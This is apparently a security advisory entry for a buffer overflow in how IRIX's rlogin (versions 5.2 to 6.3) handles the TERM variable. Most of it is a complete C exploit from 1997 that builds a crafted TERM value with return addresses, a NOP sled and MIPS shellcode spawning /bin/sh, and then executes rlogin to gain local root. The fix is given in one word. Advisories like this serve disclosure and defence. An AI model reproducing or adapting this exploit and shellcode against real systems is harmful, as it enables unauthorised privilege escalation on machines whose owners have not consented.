COMMAND
rlogin
SYSTEMS AFFECTED
IRIX 5.2, 5.3, 6.2, 6.3
PROBLEM
There exists a buffer overflow vulnerability in the rlogin program
in the way the TERM environment variable is handled. It is
possible to exploit this bug and locally gain root user
privileges. This has been found by LSD.
/*## copyright LAST STAGE OF DELIRIUM oct 1997 poland *://lsd-pl.net/ #*/
/*## /usr/bsd/rlogin #*/
#define NOPNUM 4940
#define ADRNUM 5000
#define ALLIGN 2
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[]="\x24\x0f\x12\x34";
main(int argc,char **argv){
char buffer[10000],adr[4],*b,*envp[2];
int i;
printf("copyright LAST STAGE OF DELIRIUM oct 1997 poland //lsd-pl.net/\n");
printf("/usr/bsd/rlogin for irix 5.2 5.3 6.2 6.3 IP:17,19,20,21,22,32\n\n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10288+7000;
envp[0]=buffer;
envp[1]=0;
b=buffer;
sprintf(b,"TERM=");
b+=5;
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execle("/usr/bsd/rlogin","rlogin","localhost",0,envp);
}
SOLUTION
Fixed.